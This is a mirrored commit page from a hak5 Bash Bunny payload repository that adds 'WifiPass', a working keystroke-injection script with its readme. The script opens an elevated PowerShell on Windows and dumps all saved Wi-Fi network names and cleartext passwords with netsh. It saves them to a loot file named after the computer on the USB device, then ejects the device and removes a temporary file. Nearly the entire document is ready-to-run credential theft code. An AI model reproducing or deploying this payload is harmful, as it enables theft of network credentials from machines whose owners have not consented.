mirror of
https://github.com/hak5/bashbunny-payloads.git
synced 2025-10-29 16:58:25 +00:00
Added WifiPass payload (#212)
* WifiPass payload Based on the WiFiCreds payload, with a focus on WPA networks and wider OS scope. * Lights Solid rather than blinking * Extra comment * Update payload.txt * Create readme.md * Update readme.md * Update payload.txt * Update readme.md * Update readme.md * Update readme.md * Update readme.md
This commit is contained in:
TheRoninRunner
Sebastian Kinne
parent
4d9bfeedd3
commit
4e55aae0ac
103
payloads/library/credentials/WifiPass/payload.txt
Normal file
103
payloads/library/credentials/WifiPass/payload.txt
Normal file
@ -0,0 +1,103 @@
|
||||
#!/bin/bash
|
||||
#
|
||||
# Title: WifiPass
|
||||
# Author: TheRoninRunner
|
||||
# Props: illwill
|
||||
# Version: 1.0
|
||||
# Target: Windows
|
||||
#
|
||||
# Uses the power of netsh to get a list of all wifi networks and passwords
|
||||
# stored on the computer. Windows 7 has some weird formatting issues with the
|
||||
# loot file.
|
||||
#
|
||||
# Tested and working on Windows 7, 8.1, and 10.
|
||||
#
|
||||
# Goes through the netsh wlan show profiles and runs each with key=clear,
|
||||
# saving any networks/keys that aren't open or WEP. For any network that
|
||||
# users username and password to log in, you'll get the network name only.
|
||||
#
|
||||
# Blue --- Setup
|
||||
# Yellow --- Using networks.txt to run through the networks
|
||||
# White --- Clean up
|
||||
# Green --- Done
|
||||
#
|
||||
|
||||
LED B
|
||||
|
||||
#Creates the loot directory
|
||||
mkdir -p /root/udisk/loot/WifiPass
|
||||
|
||||
#Set up the Bash Bunny and get the networks and computer name
|
||||
ATTACKMODE HID STORAGE
|
||||
Q DELAY 2000
|
||||
Q GUI
|
||||
Q DELAY 500
|
||||
Q STRING powershell
|
||||
Q DELAY 2000
|
||||
Q CTRL-SHIFT ENTER
|
||||
Q DELAY 2000
|
||||
Q LEFTARROW
|
||||
Q DELAY 200
|
||||
Q ENTER
|
||||
Q DELAY 1200
|
||||
Q STRING \$bb \= \(gwmi win32_volume -f \'label\=\'\'BashBunny\'\'\' \| Select-Object -ExpandProperty DriveLetter\)
|
||||
Q ENTER
|
||||
Q DELAY 100
|
||||
Q STRING \$compname \= \(\$env\:computername\)
|
||||
Q ENTER
|
||||
Q DELAY 100
|
||||
Q STRING \(netsh wlan show profiles \| Out-File \$bb\\loot\\WifiPass\\networks.txt\)
|
||||
Q ENTER
|
||||
Q DELAY 100
|
||||
|
||||
#Types out commands to get the Wifi names and passwords, as well as store them
|
||||
LED Y
|
||||
Q STRING \(\$lines \= Get-Content \$bb\\loot\\WifiPass\\networks.txt\)
|
||||
Q ENTER
|
||||
Q STRING foreach \(\$line in \$lines\) \{
|
||||
Q ENTER
|
||||
Q STRING \$fields \= \$line -split \'\: \'
|
||||
Q ENTER
|
||||
Q STRING \$names \= \$fields\[1\]
|
||||
Q ENTER
|
||||
Q STRING foreach \(\$name in \$names\)\{
|
||||
Q ENTER
|
||||
Q STRING \$passwd = netsh wlan show profile \$name key\=clear \| findstr Key
|
||||
Q ENTER
|
||||
Q STRING \$pass \= \$passwd -split \'\: \'
|
||||
Q ENTER
|
||||
Q STRING if \(-Not \(\$pass -eq \1\)\) \{
|
||||
Q ENTER
|
||||
Q STRING Add-Content \$bb\\loot\\WifiPass\\\$compname.txt \$name
|
||||
Q ENTER
|
||||
Q STRING Add-Content \$bb\\loot\\WifiPass\\\$compname.txt \$pass\[1\]
|
||||
Q ENTER
|
||||
Q STRING Add-Content \$bb\\loot\\WifiPass\\\$compname.txt \`n
|
||||
Q ENTER
|
||||
Q STRING }
|
||||
Q ENTER
|
||||
Q STRING }
|
||||
Q ENTER
|
||||
Q STRING }
|
||||
Q ENTER
|
||||
Q ENTER
|
||||
Q DELAY 10000
|
||||
|
||||
# Eject the USB Safely and remove networks file
|
||||
LED W
|
||||
Q STRING \$Eject \= New-Object -comObject Shell.Application
|
||||
Q ENTER
|
||||
Q DELAY 100
|
||||
Q STRING \$Eject.NameSpace\(17\).ParseName\(\$bb\).InvokeVerb\(\"Eject\"\)
|
||||
Q ENTER
|
||||
Q DELAY 100
|
||||
|
||||
# GTFO
|
||||
Q STRING EXIT
|
||||
Q ENTER
|
||||
#Sync Drive
|
||||
sync
|
||||
rm -f /root/udisk/loot/WifiPass/networks.txt
|
||||
|
||||
#Trap is clean
|
||||
LED G
|
||||
23
payloads/library/credentials/WifiPass/readme.md
Normal file
23
payloads/library/credentials/WifiPass/readme.md
Normal file
@ -0,0 +1,23 @@
|
||||
# WifiPass
|
||||
* Author: TheRoninRunner
|
||||
* Version: Version 1.0
|
||||
* Props: illwill
|
||||
* Target: Windows
|
||||
* Working on Windows 7, 8.1, and 10
|
||||
|
||||
## About
|
||||
A bit of a fork from WiFiCreds, this uses the same Powershell attack to get wifi networks and their passwords.
|
||||
|
||||
WifiPass starts with getting the list of wireless networks saved on the device, storing those to a file. With a little bit of logic, it runs through the networks, only saving out networks that have a Key Content of anything besides 1 (1 being used in the case of WEP and open networks). *NOTE: this will give you network names of university/college networks that pass user accounts to log into them. They won't give you the password with this attack.*
|
||||
|
||||
It stores all those in a loot file with the name of the computer. Eject, sync, Ghostbusters reference, then you're good to go.
|
||||
|
||||
# No Configuration needed
|
||||
|
||||
## Lights
|
||||
| LED | Status |
|
||||
|---|---|
|
||||
| Blue | Creating loot dir and getting network names |
|
||||
| Yellow | Looking through networks |
|
||||
| White | Eject drive, sync, and remove network file |
|
||||
| Green | Finished |
|
||||
Loading…
x
Reference in New Issue
Block a user